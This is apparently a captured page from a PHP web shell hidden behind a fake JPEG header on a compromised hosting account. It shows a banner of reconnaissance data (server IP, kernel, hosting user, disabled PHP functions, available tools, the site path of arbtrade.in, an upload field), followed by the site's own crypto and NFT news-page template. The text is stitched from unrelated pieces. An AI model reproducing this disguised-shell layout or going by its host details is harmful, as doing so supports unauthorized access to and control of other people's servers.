���� JFIF aewtgwgerwasdasd
Server IP : 147.93.80.58 / Your IP : 216.73.216.195 Web Server : LiteSpeed System : Linux id-dci-web1866.main-hosting.eu 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64 User : u939086737 ( 939086737) PHP Version : 8.2.28 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u939086737/domains/arbtrade.in/public_html/ |
Upload File : |
<?php include_once 'header.php' ?> <!-- head --> <div class="section section--head"> <div class="container"> <div class="row"> <!-- title --> <div class="col-12 col-md-8 offset-md-2 col-lg-6 offset-lg-3"> <div class="section__title"> <h1>News</h1> <p>Here, you'll find a curated collection of articles, analysis, and expert opinions that keep you ahead of the curve.</p> </div> </div> <!-- end title --> </div> </div> </div> <!-- end head --> <!-- news --> <div class="section"> <div class="container"> <div class="row"> <!-- post --> <div class="col-12 col-md-12 col-lg-6"> <div class="post"> <a href="article" class="post__img"> <img src="img/posts/4.jpg" alt=""> </a> <div class="post__content"> <a href="#" class="post__category">NFT</a> <h3 class="post__title"><a href="article">How to Create Your 1st Crypto NFTs</a></h3> <div class="post__meta"> <span class="post__date"><i class="ti ti-calendar-up"></i> 25.06.23</span> <span class="post__views"><i class="ti ti-eye"></i> 17</span> </div> </div> </div> </div> <!-- end post --> <!-- post --> <div class="col-12 col-md-12 col-lg-6"> <div class="post"> <a href="article" class="post__img"> <img src="img/posts/2.jpg" alt=""> </a> <div class="post__content"> <a href="#" class="post__category">Token</a> <h3 class="post__title"><a href="article">The new token is launching this planet</a></h3> <div class="post__meta"> <span class="post__date"><i class="ti ti-calendar-up"></i> 21.06.23</span> <span class="post__views"><i class="ti ti-eye"></i> 89</span> </div> </div> </div> </div> <!-- end post --> <!-- post --> <div class="col-12 col-md-12 col-lg-6"> <div class="post"> <a href="article" class="post__img"> <img src="img/posts/1.jpg" alt=""> </a> <div class="post__content"> <a href="#" class="post__category">NFT</a> <h3 class="post__title"><a href="article">Save thousands of lives through this NFT</a></h3> <div class="post__meta"> <span class="post__date"><i class="ti ti-calendar-up"></i> 19.06.23</span> <span class="post__views"><i class="ti ti-eye"></i> 142</span> </div> </div> </div> </div> <!-- end post --> <!-- post --> <div class="col-12 col-md-12 col-lg-6"> <div class="post"> <a href="article" class="post__img"> <img src="img/posts/3.jpg" alt=""> </a> <div class="post__content"> <a href="#" class="post__category">Metaverse</a> <h3 class="post__title"><a href="article">New city will be build with metaverse</a></h3> <div class="post__meta"> <span class="post__date"><i class="ti ti-calendar-up"></i> 18.06.23</span> <span class="post__views"><i class="ti ti-eye"></i> 130</span> </div> </div> </div> </div> <!-- end post --> <!-- post --> <div class="col-12 col-md-12 col-lg-6"> <div class="post"> <a href="article" class="post__img"> <img src="img/posts/5.jpg" alt=""> </a> <div class="post__content"> <a href="#" class="post__category">Art</a> <h3 class="post__title"><a href="article">The beginner’s guide to creating & selling digital art NFTs</a></h3> <div class="post__meta"> <span class="post__date"><i class="ti ti-calendar-up"></i> 15.06.23</span> <span class="post__views"><i class="ti ti-eye"></i> 162</span> </div> </div> </div> </div> <!-- end post --> <!-- post --> <div class="col-12 col-md-12 col-lg-6"> <div class="post"> <a href="article" class="post__img"> <img src="img/posts/6.jpg" alt=""> </a> <div class="post__content"> <a href="#" class="post__category">IGO</a> <h3 class="post__title"><a href="article">The next world is going with game</a></h3> <div class="post__meta"> <span class="post__date"><i class="ti ti-calendar-up"></i> 14.06.23</span> <span class="post__views"><i class="ti ti-eye"></i> 155</span> </div> </div> </div> </div> <!-- end post --> </div> <div class="row"> <!-- paginator --> <div class="col-12"> <div class="paginator"> <span class="paginator__pages">10 from 183</span> <ul class="paginator__list-mobile"> <li> <a href="#"> <i class="ti ti-arrow-left"></i> <span>Prev</span> </a> </li> <li> <a href="#"> <span>Next</span> <i class="ti ti-arrow-right"></i> </a> </li> </ul> <ul class="paginator__list"> <li> <a href="#"><i class="ti ti-arrow-left"></i></a> </li> <li><a href="#">1</a></li> <li class="active"><a href="#">2</a></li> <li><a href="#">3</a></li> <li><a href="#">4</a></li> <li><span>...</span></li> <li><a href="#">18</a></li> <li><a href="#">19</a></li> <li> <a href="#"><i class="ti ti-arrow-right"></i></a> </li> </ul> </div> </div> <!-- end paginator --> </div> </div> </div> <!-- end news --> <?php include_once 'footer.php' ?>